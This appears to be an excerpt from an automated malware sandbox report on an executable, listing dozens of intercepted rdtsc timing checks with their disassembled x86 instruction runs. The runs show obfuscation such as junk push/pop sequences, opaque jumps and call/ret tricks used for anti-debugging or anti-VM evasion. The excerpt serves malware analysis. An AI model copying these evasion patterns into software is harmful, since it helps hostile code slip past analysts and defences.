      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCEBC1 second address: BCEBCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCEBCA second address: BCEBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCEBD6 second address: BCEBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCEBDA second address: BCEBDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCEBDE second address: BCEC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push dword ptr fs:[00000000h] 0x0000000f stc 0x00000010 mov dword ptr fs:[00000000h], esp 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FA398518358h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov eax, dword ptr [ebp+122D0EF5h] 0x00000037 mov edi, eax 0x00000039 push FFFFFFFFh 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e call 00007FA398518358h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], esi 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc esi 0x00000051 push esi 0x00000052 ret 0x00000053 pop esi 0x00000054 ret 0x00000055 mov dword ptr [ebp+1247CDFAh], eax 0x0000005b push eax 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f jns 00007FA398518356h 0x00000065 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BDD4BA second address: BDD4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FA398747056h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BDD4D8 second address: BDD4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BDD4DC second address: BDD4F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA39874704Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FA39874704Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BDCBAD second address: BDCBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FA39851835Eh 0x0000000d pushad 0x0000000e popad 0x0000000f jp 00007FA398518356h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA398518364h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BDCBDA second address: BDCBDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE46F9 second address: BE470B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 ja 00007FA398518356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE4DA3 second address: BE4DCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA398747058h 0x00000008 jne 00007FA398747046h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE4DCD second address: BE4DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE4DD2 second address: BE4E00 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA398747048h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 js 00007FA398747053h 0x00000016 push edx 0x00000017 jmp 00007FA39874704Bh 0x0000001c pop edx 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007FA398747046h 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE4E00 second address: BE4E0D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA398518356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE4E0D second address: BE4E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE4F1A second address: BE4F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE4F1E second address: BE4F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE4F2F second address: BE4F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA398518363h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FA398518366h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE5149 second address: A17B18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398747055h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FA39874704Ch 0x0000000f push dword ptr [ebp+122D03B1h] 0x00000015 jg 00007FA39874705Ch 0x0000001b call dword ptr [ebp+122D2CCAh] 0x00000021 pushad 0x00000022 pushad 0x00000023 sub dword ptr [ebp+122D3632h], ecx 0x00000029 pushad 0x0000002a movsx ecx, si 0x0000002d mov dx, 5821h 0x00000031 popad 0x00000032 popad 0x00000033 xor eax, eax 0x00000035 mov dword ptr [ebp+122D3632h], esi 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f pushad 0x00000040 jnp 00007FA398747055h 0x00000046 call 00007FA39874704Eh 0x0000004b pop edi 0x0000004c mov edx, dword ptr [ebp+122D2A1Bh] 0x00000052 popad 0x00000053 mov dword ptr [ebp+122D2A77h], eax 0x00000059 mov dword ptr [ebp+122D2F6Ah], ecx 0x0000005f mov esi, 0000003Ch 0x00000064 pushad 0x00000065 xor dword ptr [ebp+122D18E1h], esi 0x0000006b sub bx, BBC6h 0x00000070 popad 0x00000071 add esi, dword ptr [esp+24h] 0x00000075 mov dword ptr [ebp+122D2F6Ah], eax 0x0000007b lodsw 0x0000007d jnp 00007FA39874704Ch 0x00000083 sub dword ptr [ebp+122D1858h], edx 0x00000089 add eax, dword ptr [esp+24h] 0x0000008d add dword ptr [ebp+122D1858h], edx 0x00000093 mov ebx, dword ptr [esp+24h] 0x00000097 jl 00007FA39874705Eh 0x0000009d push eax 0x0000009e push eax 0x0000009f push edx 0x000000a0 jmp 00007FA39874704Eh 0x000000a5 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BEA0E9 second address: BEA125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FA39851835Fh 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f jl 00007FA39851837Eh 0x00000015 jmp 00007FA398518364h 0x0000001a pushad 0x0000001b jg 00007FA398518356h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BEA125 second address: BEA12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE9315 second address: BE9337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FA39851836Dh 0x0000000b jmp 00007FA398518361h 0x00000010 jne 00007FA398518356h 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE9337 second address: BE9354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA398747059h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE9354 second address: BE9358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE9358 second address: BE9380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FA39874704Ch 0x0000001a jp 00007FA398747046h 0x00000020 popad 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE9380 second address: BE9396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA398518362h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE9AC9 second address: BE9ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE9ACD second address: BE9AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FA398518367h 0x0000000c jmp 00007FA39851835Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BE9DDC second address: BE9DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF0650 second address: BF0654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF0654 second address: BF0678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA398747059h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC39D7 second address: BC39DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC39DC second address: BA0FD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FA398747058h 0x00000012 lea eax, dword ptr [ebp+1247F761h] 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FA398747048h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 nop 0x00000033 jg 00007FA39874704Eh 0x00000039 push eax 0x0000003a jmp 00007FA398747054h 0x0000003f nop 0x00000040 push 00000000h 0x00000042 push ecx 0x00000043 call 00007FA398747048h 0x00000048 pop ecx 0x00000049 mov dword ptr [esp+04h], ecx 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc ecx 0x00000056 push ecx 0x00000057 ret 0x00000058 pop ecx 0x00000059 ret 0x0000005a mov ecx, dword ptr [ebp+122D2953h] 0x00000060 mov dword ptr [ebp+12441072h], eax 0x00000066 call dword ptr [ebp+122D2672h] 0x0000006c pushad 0x0000006d jno 00007FA398747048h 0x00000073 jp 00007FA39874704Eh 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC4004 second address: BC400E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC40EB second address: BC40F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC42AE second address: BC42D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 push edi 0x00000012 jo 00007FA398518356h 0x00000018 pop edi 0x00000019 pop edx 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007FA39851835Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC42D4 second address: BC42D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC42D8 second address: BC42EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC42EC second address: BC42F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC42F1 second address: BC42F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC43AF second address: BC43B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC4890 second address: BC4902 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FA398518356h 0x00000009 jmp 00007FA398518363h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 js 00007FA39851835Ah 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c nop 0x0000001d mov di, cx 0x00000020 mov cl, 30h 0x00000022 push 0000001Eh 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007FA398518358h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 00000017h 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e add dh, FFFFFFA2h 0x00000041 mov dl, ch 0x00000043 push eax 0x00000044 push ecx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FA398518368h 0x0000004c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC4902 second address: BC4906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC4A01 second address: BC4A08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCFC86 second address: BCFC90 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA398747046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCFC90 second address: BCFC96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BD1AF9 second address: BD1AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BD2A7B second address: BD2A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BD2A84 second address: BD2A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BD2A88 second address: BD2A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BD5B5C second address: BD5B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC4B43 second address: BC4B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC4B47 second address: BC4B5D instructions: 0x00000000 rdtsc 0x00000002 je 00007FA398747046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jng 00007FA398747046h 0x00000015 pop eax 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC4B5D second address: BC4B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC4B63 second address: BC4B75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC4B75 second address: BC4B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 je 00007FA398518356h 0x0000000c pop edx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push ecx 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007FA39851835Ch 0x00000022 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC4C64 second address: BA1C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 mov dword ptr [ebp+122D2E9Bh], esi 0x0000000d lea eax, dword ptr [ebp+1247F761h] 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FA398747048h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D27A9h], edi 0x00000033 nop 0x00000034 pushad 0x00000035 jmp 00007FA398747057h 0x0000003a push edi 0x0000003b jp 00007FA398747046h 0x00000041 pop edi 0x00000042 popad 0x00000043 push eax 0x00000044 jo 00007FA39874704Ah 0x0000004a push esi 0x0000004b pushad 0x0000004c popad 0x0000004d pop esi 0x0000004e nop 0x0000004f xor dword ptr [ebp+122D19BBh], edi 0x00000055 call dword ptr [ebp+12446C7Ch] 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FA39874704Fh 0x00000062 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF0C2F second address: BF0C47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398518364h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF0C47 second address: BF0C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF0DA1 second address: BF0DBC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jbe 00007FA398518356h 0x0000000b pop edx 0x0000000c pushad 0x0000000d jmp 00007FA39851835Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF0DBC second address: BF0DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA398747056h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FA398747051h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF10BB second address: BF10ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398518360h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b jmp 00007FA398518368h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF10ED second address: BF10F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF611F second address: BF6125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF6125 second address: BF6129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF6129 second address: BF612D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF6943 second address: BF697D instructions: 0x00000000 rdtsc 0x00000002 js 00007FA398747046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FA398747070h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF697D second address: BF6987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA398518356h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF6AE6 second address: BF6AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BF6FAB second address: BF6FCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398518366h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FA39851835Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BFC1F7 second address: BFC1FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BFC1FB second address: BFC20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007FA398518356h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BFC20C second address: BFC242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA398747046h 0x0000000a js 00007FA398747046h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FA39874704Eh 0x00000019 jmp 00007FA398747055h 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C01F09 second address: C01F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA39851835Ch 0x00000009 rdtsc
